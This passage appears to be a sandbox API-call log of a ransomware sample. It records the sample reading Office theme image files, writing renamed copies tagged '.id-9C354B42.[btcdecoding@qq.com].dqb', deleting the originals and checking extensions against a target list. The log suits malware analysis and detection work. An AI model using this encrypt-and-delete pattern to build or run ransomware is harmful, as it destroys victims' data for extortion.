(normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.344] GetLastError () returned 0x0 [0044.344] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xbbf3, lpOverlapped=0x0) returned 1 [0044.346] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xbc00, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xbc00, lpOverlapped=0x0) returned 1 [0044.347] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.347] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.347] SetEndOfFile (hFile=0x204) returned 1 [0044.347] CloseHandle (hObject=0x204) returned 1 [0044.348] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.348] SetEndOfFile (hFile=0x160) returned 1 [0044.349] CloseHandle (hObject=0x160) returned 1 [0044.349] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.349] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 1 [0044.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.349] lstrlenW (lpString=".doc") returned 4 [0044.349] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.349] lstrlenW (lpString=".docx") returned 5 [0044.349] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.349] lstrlenW (lpString=".pdf") returned 4 [0044.349] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.349] lstrlenW (lpString=".xls") returned 4 [0044.349] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.349] lstrlenW (lpString=".xlsx") returned 5 [0044.349] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.349] lstrlenW (lpString=".ppt") returned 4 [0044.349] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.349] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.349] lstrlenW (lpString=".zip") returned 4 [0044.349] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.349] lstrlenW (lpString=".rar") returned 4 [0044.349] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.350] lstrlenW (lpString=".bz2") returned 4 [0044.350] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.350] lstrlenW (lpString=".7z") returned 3 [0044.350] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.350] lstrlenW (lpString=".dbf") returned 4 [0044.350] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.350] lstrlenW (lpString=".1cd") returned 4 [0044.350] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.350] lstrlenW (lpString=".jpg") returned 4 [0044.350] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.350] lstrlenW (lpString=".doc") returned 4 [0044.350] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.350] lstrlenW (lpString=".docx") returned 5 [0044.350] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.350] lstrlenW (lpString=".pdf") returned 4 [0044.350] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.350] lstrlenW (lpString=".xls") returned 4 [0044.350] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.350] lstrlenW (lpString=".xlsx") returned 5 [0044.350] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.350] lstrlenW (lpString=".ppt") returned 4 [0044.350] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.350] lstrlenW (lpString=".zip") returned 4 [0044.350] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.350] lstrlenW (lpString=".rar") returned 4 [0044.350] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.350] lstrlenW (lpString=".bz2") returned 4 [0044.350] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.350] lstrlenW (lpString=".7z") returned 3 [0044.350] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.351] lstrlenW (lpString=".dbf") returned 4 [0044.351] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.351] lstrlenW (lpString=".1cd") returned 4 [0044.351] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0044.351] lstrlenW (lpString=".jpg") returned 4 [0044.351] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.351] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.351] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.351] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.351] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=1364) returned 1 [0044.351] CloseHandle (hObject=0x160) returned 1 [0044.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 0x20 [0044.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.352] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.352] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.353] GetLastError () returned 0x0 [0044.353] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x554, lpOverlapped=0x0) returned 1 [0044.354] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x560, lpOverlapped=0x0) returned 1 [0044.355] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.355] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.355] SetEndOfFile (hFile=0x204) returned 1 [0044.358] CloseHandle (hObject=0x204) returned 1 [0044.358] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.358] SetEndOfFile (hFile=0x160) returned 1 [0044.359] CloseHandle (hObject=0x160) returned 1 [0044.359] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.359] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif")) returned 1 [0044.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.359] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.359] lstrlenW (lpString=".doc") returned 4 [0044.359] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.360] lstrlenW (lpString=".docx") returned 5 [0044.360] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.360] lstrlenW (lpString=".pdf") returned 4 [0044.360] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.360] lstrlenW (lpString=".xls") returned 4 [0044.360] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.360] lstrlenW (lpString=".xlsx") returned 5 [0044.360] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.360] lstrlenW (lpString=".ppt") returned 4 [0044.360] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.360] lstrlenW (lpString=".zip") returned 4 [0044.360] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.360] lstrlenW (lpString=".rar") returned 4 [0044.360] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.360] lstrlenW (lpString=".bz2") returned 4 [0044.360] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.360] lstrlenW (lpString=".7z") returned 3 [0044.360] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.360] lstrlenW (lpString=".dbf") returned 4 [0044.360] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.360] lstrlenW (lpString=".1cd") returned 4 [0044.360] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.360] lstrlenW (lpString=".jpg") returned 4 [0044.360] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.360] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.360] lstrlenW (lpString=".doc") returned 4 [0044.360] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.360] lstrlenW (lpString=".docx") returned 5 [0044.360] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.360] lstrlenW (lpString=".pdf") returned 4 [0044.361] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.361] lstrlenW (lpString=".xls") returned 4 [0044.361] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.361] lstrlenW (lpString=".xlsx") returned 5 [0044.361] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.361] lstrlenW (lpString=".ppt") returned 4 [0044.361] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.361] lstrlenW (lpString=".zip") returned 4 [0044.361] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.361] lstrlenW (lpString=".rar") returned 4 [0044.361] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.361] lstrlenW (lpString=".bz2") returned 4 [0044.361] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.361] lstrlenW (lpString=".7z") returned 3 [0044.361] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.361] lstrlenW (lpString=".dbf") returned 4 [0044.361] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.361] lstrlenW (lpString=".1cd") returned 4 [0044.361] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 75 [0044.361] lstrlenW (lpString=".jpg") returned 4 [0044.361] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.361] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.361] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.361] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.362] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=11573) returned 1 [0044.362] CloseHandle (hObject=0x160) returned 1 [0044.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 0x20 [0044.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.362] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.362] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.362] GetLastError () returned 0x0 [0044.362] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x2d35, lpOverlapped=0x0) returned 1 [0044.726] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2d40, lpOverlapped=0x0) returned 1 [0044.727] ReadFile (in: hFile=0x160, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.727] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.727] SetEndOfFile (hFile=0x204) returned 1 [0044.727] CloseHandle (hObject=0x204) returned 1 [0044.727] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.727] SetEndOfFile (hFile=0x160) returned 1 [0044.728] CloseHandle (hObject=0x160) returned 1 [0044.728] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.728] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png")) returned 1 [0044.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.728] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.728] lstrlenW (lpString=".doc") returned 4 [0044.729] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.729] lstrlenW (lpString=".docx") returned 5 [0044.729] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.729] lstrlenW (lpString=".pdf") returned 4 [0044.729] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.729] lstrlenW (lpString=".xls") returned 4 [0044.729] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.729] lstrlenW (lpString=".xlsx") returned 5 [0044.729] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.729] lstrlenW (lpString=".ppt") returned 4 [0044.729] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.729] lstrlenW (lpString=".zip") returned 4 [0044.729] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.729] lstrlenW (lpString=".rar") returned 4 [0044.729] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.729] lstrlenW (lpString=".bz2") returned 4 [0044.729] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.729] lstrlenW (lpString=".7z") returned 3 [0044.729] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.729] lstrlenW (lpString=".dbf") returned 4 [0044.729] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.729] lstrlenW (lpString=".1cd") returned 4 [0044.729] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.729] lstrlenW (lpString=".jpg") returned 4 [0044.729] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.729] lstrlenW (lpString=".doc") returned 4 [0044.729] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.729] lstrlenW (lpString=".docx") returned 5 [0044.730] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.730] lstrlenW (lpString=".pdf") returned 4 [0044.730] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.730] lstrlenW (lpString=".xls") returned 4 [0044.730] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.730] lstrlenW (lpString=".xlsx") returned 5 [0044.730] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.730] lstrlenW (lpString=".ppt") returned 4 [0044.730] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.730] lstrlenW (lpString=".zip") returned 4 [0044.730] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.730] lstrlenW (lpString=".rar") returned 4 [0044.730] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.730] lstrlenW (lpString=".bz2") returned 4 [0044.730] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.730] lstrlenW (lpString=".7z") returned 3 [0044.730] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.730] lstrlenW (lpString=".dbf") returned 4 [0044.730] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.730] lstrlenW (lpString=".1cd") returned 4 [0044.730] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 76 [0044.730] lstrlenW (lpString=".jpg") returned 4 [0044.730] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.730] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.730] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.731] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=3611) returned 1 [0044.731] CloseHandle (hObject=0x160) returned 1 [0044.731] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif")) returned 0x20 [0044.731] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0044.731] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.731] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.731] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft 